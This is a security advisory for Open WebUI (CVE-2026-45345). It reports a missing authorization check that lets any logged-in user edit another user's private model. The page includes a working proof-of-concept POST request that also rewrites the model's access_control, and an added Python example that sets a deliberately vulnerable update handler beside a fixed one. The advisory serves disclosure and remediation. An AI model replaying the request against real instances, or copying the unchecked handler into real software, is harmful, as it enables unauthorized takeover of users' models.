GHSA-gm54-m39w-grjp

Source
https://github.com/advisories/GHSA-gm54-m39w-grjp
Import Source
https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2026/05/GHSA-gm54-m39w-grjp/GHSA-gm54-m39w-grjp.json
JSON Data
https://api.osv.dev/v1/vulns/GHSA-gm54-m39w-grjp
Aliases
  • CVE-2026-45345
Published
2026-05-14T20:21:38Z
Modified
2026-05-19T16:15:13.884732848Z
Severity
  • 6.5 (Medium) CVSS_V3 - CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:N
Summary
Open WebUI missing authorization check at the model update function - models from other users can be updated
Details

Summary

Any authenticated user can modify another user's model through the model update endpoint, even if that model's visibility is set to Private. The finding resulted from a penetration test for a customer. The root cause is suspected to lie in the core of Open WebUI, which is why it is reported here as a security issue. Tested on Open WebUI 0.5.4.

Details / PoC

The user Victim created a model with its visibility set to Private (screenshot omitted):

The user Attacker, who has neither read nor write access to that model, can edit it with the following POST request (the id query parameter and the id field in the body are the victim's model id):

POST /api/v1/models/model/update?id=aaabraaa HTTP/2
Host: domain.local
//Some headers removed
Te: trailers

{"id":"aaabraaa","base_model_id":"gpt-4o-POC","name":"testmodel","meta":{"profile_image_url":"/static/favicon.png","description":"","capabilities":{"vision":true,"usage":false,"citations":true},"suggestion_prompts":null,"tags":[],"toolIds":["test"]},"params":{},"user_id":"565c82e6-083f-42bb-bf0f-a4e214cfb9ad","access_control":{"read":{"group_ids":[],"user_ids":[]},"write":{"group_ids":[],"user_ids":[]}},"is_active":true,"updated_at":1737314575,"created_at":1737121281}

Request / Response (screenshot omitted)

Impact

Any authenticated user can modify another user's model even if its visibility is set to Private. Because the access_control object in the request body is accepted as-is, the attacker can also rewrite the read and write permissions during the edit (for example, adding their own user id to access_control.write.user_ids) and thereby gain persistent unauthorized access to the model.
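The following is an added example written for this page, not Open WebUI's own code. It shows, side by side, an update handler that only verifies authentication (the behaviour described in the PoC above) and the same handler with the missing authorization check added, then replays the PoC against both. The access_control shape follows the request body on this page; the User/Model classes, the "admin" role, the group lookup, the in-memory MODELS table and the Forbidden/NotFound exceptions are assumptions made for the example.

```python
"""Added example (not Open WebUI's code): authentication-only model update vs.
an update that enforces ownership / write access (CWE-285)."""
import copy
from dataclasses import dataclass, field
from typing import Dict, List, Optional


@dataclass
class User:
    id: str
    role: str = "user"                       # assumed: "user" or "admin"
    group_ids: List[str] = field(default_factory=list)


@dataclass
class Model:
    id: str
    user_id: str                             # owner; read from storage, never from the request
    name: str
    # access_control follows the PoC body; None stands for "public" in this example
    access_control: Optional[dict] = None


MODELS: Dict[str, Model] = {}                # stand-in for the models table


class NotFound(Exception):
    pass


class Forbidden(Exception):
    pass


def has_write_access(user: User, model: Model) -> bool:
    """Owner, admin, or anyone listed under access_control["write"]."""
    if user.role == "admin" or model.user_id == user.id:
        return True
    if model.access_control is None:
        return False                         # public-read does not imply public-write
    write = model.access_control.get("write", {})
    if user.id in write.get("user_ids", []):
        return True
    return bool(set(user.group_ids) & set(write.get("group_ids", [])))


def update_model_vulnerable(user: User, model_id: str, form: dict) -> Model:
    """Only authentication is assumed to have happened; no ownership check."""
    model = MODELS.get(model_id)
    if model is None:
        raise NotFound(model_id)
    model.name = form.get("name", model.name)
    model.access_control = form.get("access_control", model.access_control)
    return model


def update_model_fixed(user: User, model_id: str, form: dict) -> Model:
    """Same handler with the authorization check in place."""
    model = MODELS.get(model_id)
    if model is None:
        raise NotFound(model_id)
    if not has_write_access(user, model):
        raise Forbidden(f"{user.id} may not edit model {model_id}")
    if "access_control" in form and form["access_control"] != model.access_control:
        # Only the owner or an admin may change who can read/write the model;
        # a collaborator with write access must not be able to widen it.
        if not (user.role == "admin" or model.user_id == user.id):
            raise Forbidden("only the owner may change access_control")
        model.access_control = form["access_control"]
    model.name = form.get("name", model.name)
    # form["user_id"] is deliberately ignored: ownership is not transferable here.
    return model


def attempt(handler, user: User, model_id: str, form: dict) -> str:
    """Run a handler and summarise the result as a string."""
    try:
        handler(user, model_id, form)
        return "updated"
    except Forbidden:
        return "forbidden"
    except NotFound:
        return "not found"


PRIVATE = {"read": {"group_ids": [], "user_ids": []},
           "write": {"group_ids": [], "user_ids": []}}


def run_scenario(handler) -> dict:
    """Replay the PoC: attacker edits victim's private model and grants itself write access."""
    MODELS.clear()
    victim, attacker = User("victim"), User("attacker")
    MODELS["aaabraaa"] = Model("aaabraaa", victim.id, "victim-model",
                               access_control=copy.deepcopy(PRIVATE))
    payload = {"id": "aaabraaa", "name": "testmodel", "user_id": attacker.id,
               "access_control": {"read": {"group_ids": [], "user_ids": [attacker.id]},
                                  "write": {"group_ids": [], "user_ids": [attacker.id]}}}
    outcome = attempt(handler, attacker, "aaabraaa", payload)
    m = MODELS["aaabraaa"]
    return {"outcome": outcome, "name": m.name, "owner": m.user_id,
            "attacker_can_write": has_write_access(attacker, m)}


if __name__ == "__main__":
    print("vulnerable:", run_scenario(update_model_vulnerable))
    print("fixed:     ", run_scenario(update_model_fixed))
```

The check that matters is the one before any field is written: the handler must look up the stored model and compare the caller against its owner and access_control, rather than trusting the user_id or access_control values carried in the request body. Keeping access_control changes owner-only is a stricter design choice than the page requires, but it closes the second step of the impact (a writer granting itself or others further access).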

Database specific
{
    "cwe_ids": [
        "CWE-285"
    ],
    "severity": "MODERATE",
    "github_reviewed_at": "2026-05-14T20:21:38Z",
    "github_reviewed": true,
    "nvd_published_at": "2026-05-15T22:16:54Z"
}
Affected packages

PyPI / open-webui

Affected ranges

Type
ECOSYSTEM
Events
Introduced
0 (unknown introduced version; all previous versions are affected)
Fixed
0.5.7

Affected versions

0.*
0.1.124
0.1.125
0.2.0
0.2.1
0.2.2
0.2.3
0.2.4
0.2.5
0.3.0
0.3.1
0.3.2
0.3.3
0.3.4
0.3.5
0.3.6
0.3.7
0.3.8
0.3.9
0.3.10
0.3.12
0.3.13
0.3.14
0.3.15
0.3.16
0.3.17.dev2
0.3.17.dev3
0.3.17.dev4
0.3.17.dev5
0.3.17
0.3.18
0.3.19
0.3.20
0.3.21
0.3.22
0.3.23
0.3.24
0.3.25
0.3.26
0.3.27.dev1
0.3.27.dev2
0.3.27.dev3
0.3.27
0.3.28
0.3.29
0.3.30.dev1
0.3.30.dev2
0.3.30
0.3.31.dev1
0.3.31
0.3.32
0.3.33.dev1
0.3.33
0.3.34
0.3.35
0.4.0.dev1
0.4.0.dev2
0.4.0
0.4.1
0.4.2
0.4.3
0.4.4
0.4.5
0.4.6.dev1
0.4.6
0.4.7
0.4.8
0.5.0.dev1
0.5.0.dev2
0.5.0
0.5.1
0.5.2
0.5.3.dev1
0.5.3
0.5.4
0.5.5
0.5.6

Database specific
{
    "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2026/05/GHSA-gm54-m39w-grjp/GHSA-gm54-m39w-grjp.json",
    "last_known_affected_version_range": "<= 0.5.6"
}